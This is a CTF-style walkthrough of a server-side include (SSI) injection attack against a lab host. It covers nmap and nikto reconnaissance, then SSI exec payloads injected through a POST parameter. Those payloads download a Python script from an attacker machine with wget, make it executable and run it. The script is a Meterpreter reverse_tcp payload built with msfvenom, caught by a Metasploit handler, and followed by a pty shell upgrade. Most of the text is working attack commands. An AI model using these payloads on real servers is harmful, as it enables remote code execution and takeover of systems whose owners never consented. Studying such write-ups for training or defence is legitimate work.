1. Introduction to SSI injection attacks
The emergence of SSI is to give dynamic effects to html static pages. SSI executes system commands and returns corresponding results.
If .stm, .shtm, .shtml appear in the website directory, and the website does not strictly filter the input of SSI, it is likely to be attacked by SSI.
2. Information detection
#扫描主机服务信息以及服务版本
nmap -sV 192.168.2.119
#快速扫描主机全部信息
nmap -T4 -A -v 192.168.2.119
#探测敏感信息
nikto -host http://192.168.2.119
3. Dig deeper
4. Vulnerability exploitation
Places with POST parameters in the page
try to submit: the
server returns the result:
check the result to determine that exec is filtered, try to use it! + EXEC
return result:
#列举当前目录中的文件和目录
<!--#exec cmd="ls" -->
#切换到指定目录
<!--#exec cmd="cd/root/dir">
#下载shell脚本并运行
<!--#exec cmd="wget http://192.168.2.110/shell.py" -->
5. Make a webshell
msfvenom -p python/meterpreter/reverse_tcp lhost=192.168.2.110 lport=4444 -f raw > /root/Desktop/shell.py
#启动监听
msf> use exploit/multi/handler
>set payload python/meterpreter/reverse_tcp
>set lhost 192.168.2.110
>set lport 4444
>run
#在攻击机开启web服务,后续命令从攻击机访问下载shell
mv shell.py /var/www/html/
service apache2 start
#下载shell脚本并运行
<!--#exec cmd="wget http://192.168.2.110/shell.py" -->
<!--#EXEC cmd="chmod 777 shell.py" -->
<!--#EXEC cmd="python shell.py" -->
6. Perform operations
sysinfo 查看系统信息
shell 进入系统shell
#优化终端
python -c "import pty;pty.spawn('/bin/bash')"
Follow-up still needs to raise the right to find the flag operation
7. Summary
In the CTF competition, there are many filtering mechanisms for SSI vulnerable servers, which need to be bypassed, such as upper and lower case